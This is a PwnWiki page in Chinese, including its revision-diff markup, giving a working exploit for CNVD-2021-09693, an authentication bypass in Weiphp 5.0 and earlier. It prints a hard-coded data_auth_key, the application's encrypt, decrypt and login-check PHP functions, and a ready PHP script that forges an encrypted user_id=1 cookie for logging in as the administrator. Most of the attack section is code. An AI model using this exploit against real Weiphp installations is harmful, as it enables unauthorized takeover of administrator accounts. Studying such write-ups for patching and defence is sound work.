Difference between revisions of "CNVD-2021-09693 Weiphp5.0 任意用戶Cookie偽造漏洞"
From PwnWiki
(Created page with "<languages /> <translate> ==漏洞影響== </translate> <pre> Weiphp <= 5.0 </pre> <translate> ==漏洞利用== </translate> <translate> 首先需要得到數據庫配置...") |
(Marked this version for translation) |
||
| Line 2: | Line 2: | ||
<translate> | <translate> | ||
| − | ==漏洞影響== | + | ==漏洞影響== <!--T:1--> |
</translate> | </translate> | ||
<pre> | <pre> | ||
| Line 10: | Line 10: | ||
<translate> | <translate> | ||
| − | ==漏洞利用== | + | ==漏洞利用== <!--T:2--> |
</translate> | </translate> | ||
<translate> | <translate> | ||
| + | <!--T:3--> | ||
首先需要得到數據庫配置文件中的<code>data_auth_key</code>密鑰 | 首先需要得到數據庫配置文件中的<code>data_auth_key</code>密鑰 | ||
</translate> | </translate> | ||
| Line 20: | Line 21: | ||
<translate> | <translate> | ||
| + | <!--T:4--> | ||
得到這個配置文件可參考 [https://www.pwnwiki.org/index.php?title=CNVD-2020-68596_Weiphp5.0_%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AE%80%E5%8F%96%E6%BC%8F%E6%B4%9E CNVD-2020-68596 Weiphp5.0 前台文件任意讀取漏洞] | 得到這個配置文件可參考 [https://www.pwnwiki.org/index.php?title=CNVD-2020-68596_Weiphp5.0_%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AE%80%E5%8F%96%E6%BC%8F%E6%B4%9E CNVD-2020-68596 Weiphp5.0 前台文件任意讀取漏洞] | ||
</translate> | </translate> | ||
| Line 30: | Line 32: | ||
<translate> | <translate> | ||
| + | <!--T:5--> | ||
全局查找使用了這個密鑰的地方: | 全局查找使用了這個密鑰的地方: | ||
</translate> | </translate> | ||
| Line 37: | Line 40: | ||
<translate> | <translate> | ||
| + | <!--T:6--> | ||
找到了跟據這個密鑰的加密方法和解密方法 | 找到了跟據這個密鑰的加密方法和解密方法 | ||
</translate> | </translate> | ||
| Line 42: | Line 46: | ||
<translate> | <translate> | ||
| + | <!--T:7--> | ||
加密方法 <code>think_encrypt</code> | 加密方法 <code>think_encrypt</code> | ||
</translate> | </translate> | ||
| Line 84: | Line 89: | ||
<translate> | <translate> | ||
| + | <!--T:8--> | ||
解密方法 <code>think_decrypt</code> | 解密方法 <code>think_decrypt</code> | ||
</translate> | </translate> | ||
| Line 135: | Line 141: | ||
<translate> | <translate> | ||
| + | <!--T:9--> | ||
在文件 <code>application\common.php</code> 中含有使用解密方法的代碼,用於做身份驗證 | 在文件 <code>application\common.php</code> 中含有使用解密方法的代碼,用於做身份驗證 | ||
</translate> | </translate> | ||
| Line 161: | Line 168: | ||
<translate> | <translate> | ||
| + | <!--T:10--> | ||
根據這裡得到的代碼,可以知道當user_Id=1時,會解密密鑰後判斷是否正確,如果正確則可以登錄系統 | 根據這裡得到的代碼,可以知道當user_Id=1時,會解密密鑰後判斷是否正確,如果正確則可以登錄系統 | ||
| + | <!--T:11--> | ||
我們在本地使用加密代碼加密user_id=1得到的cookie則可以登錄系統 | 我們在本地使用加密代碼加密user_id=1得到的cookie則可以登錄系統 | ||
</translate> | </translate> | ||
| Line 211: | Line 220: | ||
<translate> | <translate> | ||
| + | <!--T:12--> | ||
添加<code>cookie: user_id=xxxxxxxx</code>即可成功登錄 | 添加<code>cookie: user_id=xxxxxxxx</code>即可成功登錄 | ||
</translate> | </translate> | ||
| Line 218: | Line 228: | ||
<translate> | <translate> | ||
| − | ==參考== | + | ==參考== <!--T:13--> |
</translate> | </translate> | ||
http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7Cookie%E4%BC%AA%E9%80%A0%20CNVD-2021-09693.html | http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7Cookie%E4%BC%AA%E9%80%A0%20CNVD-2021-09693.html | ||
Latest revision as of 11:56, 8 April 2021
漏洞影響
Weiphp <= 5.0
漏洞利用
首先需要得到數據庫配置文件中的data_auth_key密鑰
得到這個配置文件可參考 CNVD-2020-68596 Weiphp5.0 前台文件任意讀取漏洞
'data_auth_key' => '+0SeoAC#YR,Jm&c?[PhUg9u;:Drd8Fj4q|XOkx*T'
全局查找使用了這個密鑰的地方:
找到了跟據這個密鑰的加密方法和解密方法
加密方法 think_encrypt
function think_encrypt($data, $key = '', $expire = 0)
{
$key = md5(empty($key) ? config('database.data_auth_key') : $key);
$data = base64_encode($data);
$x = 0;
$len = strlen($data);
$l = strlen($key);
$char = '';
for ($i = 0; $i < $len; $i++) {
if ($x == $l) {
$x = 0;
}
$char .= substr($key, $x, 1);
$x++;
}
$str = sprintf('%010d', $expire ? $expire + time() : 0);
for ($i = 0; $i < $len; $i++) {
$str .= chr(ord(substr($data, $i, 1)) + (ord(substr($char, $i, 1))) % 256);
}
return str_replace(array(
'+',
'/',
'='
), array(
'-',
'_',
''
), base64_encode($str));
}
解密方法 think_decrypt
function think_decrypt($data, $key = '')
{
$key = md5(empty($key) ? config('database.data_auth_key') : $key);
$data = str_replace(array(
'-',
'_'
), array(
'+',
'/'
), $data);
$mod4 = strlen($data) % 4;
if ($mod4) {
$data .= substr('====', $mod4);
}
$data = base64_decode($data);
$expire = substr($data, 0, 10);
$data = substr($data, 10);
if ($expire > 0 && $expire < time()) {
return '';
}
$x = 0;
$len = strlen($data);
$l = strlen($key);
$char = $str = '';
for ($i = 0; $i < $len; $i++) {
if ($x == $l) {
$x = 0;
}
$char .= substr($key, $x, 1);
$x++;
}
for ($i = 0; $i < $len; $i++) {
if (ord(substr($data, $i, 1)) < ord(substr($char, $i, 1))) {
$str .= chr((ord(substr($data, $i, 1)) + 256) - ord(substr($char, $i, 1)));
} else {
$str .= chr(ord(substr($data, $i, 1)) - ord(substr($char, $i, 1)));
}
}
return base64_decode($str);
}
在文件 application\common.php 中含有使用解密方法的代碼,用於做身份驗證
function is_login()
{
$user = session('user_auth');
if (empty($user)) {
$cookie_uid = cookie('user_id');
if (!empty($cookie_uid)) {
$uid = think_decrypt($cookie_uid);
$userinfo = getUserInfo($uid);
D('common/User')->autoLogin($userinfo);
$user = session('user_auth');
}
}
if (empty($user)) {
return 0;
} else {
return session('user_auth_sign') == data_auth_sign($user) ? $user['uid'] : 0;
}
}
根據這裡得到的代碼,可以知道當user_Id=1時,會解密密鑰後判斷是否正確,如果正確則可以登錄系統
我們在本地使用加密代碼加密user_id=1得到的cookie則可以登錄系統
<?php
show_source(__FILE__);
function think_encrypt($data, $key = '', $expire = 0)
{
$key = '+0SeoAC#YR,Jm&c?[PhUg9u;:Drd8Fj4q|XOkx*T';
$key = md5($key);
$data = base64_encode($data);
$x = 0;
$len = strlen($data);
$l = strlen($key);
$char = '';
for ($i = 0; $i < $len; $i++) {
if ($x == $l) {
$x = 0;
}
$char .= substr($key, $x, 1);
$x++;
}
$str = sprintf('%010d', $expire ? $expire + time() : 0);
for ($i = 0; $i < $len; $i++) {
$str .= chr(ord(substr($data, $i, 1)) + (ord(substr($char, $i, 1))) % 256);
}
return str_replace(array(
'+',
'/',
'='
), array(
'-',
'_',
''
), base64_encode($str));
}
echo 'user_id = ' . think_encrypt($_GET['user_id']);
?>
添加cookie: user_id=xxxxxxxx即可成功登錄
